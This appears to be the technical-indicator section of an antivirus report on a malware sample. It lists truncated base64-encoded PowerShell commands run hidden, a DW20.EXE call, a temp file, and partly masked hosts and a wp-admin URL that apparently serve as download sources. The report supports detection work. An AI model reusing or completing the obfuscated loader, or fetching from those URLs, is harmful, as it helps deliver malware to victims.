Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABBAGoAZQBuAHUAZwA3AD0AWwBjAGgAYQByAF0ANAAyADsAJABXAHMAZAB5ADQAbABlAD0AKAAnAFgAJwArACgAJwByAG0AagA1AHYAJwArACcAagAnACkAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1960
- %TEMP%\1006970.cvr
- 'er###-hofer.de':443
- 'fa###ha.com.br':80
- http://fa###ha.com.br/wp-admin/Nwi134V/
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABBAGoAZQBuAHUAZwA3AD0AWwBjAGgAYQByAF0ANAAyADsAJABXAHMAZAB5ADQAbABlAD0AKAAnAFgAJwArACgAJwByAG0AagA1AHYAJwArACcAagAnACkAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQ...' (with hidden window)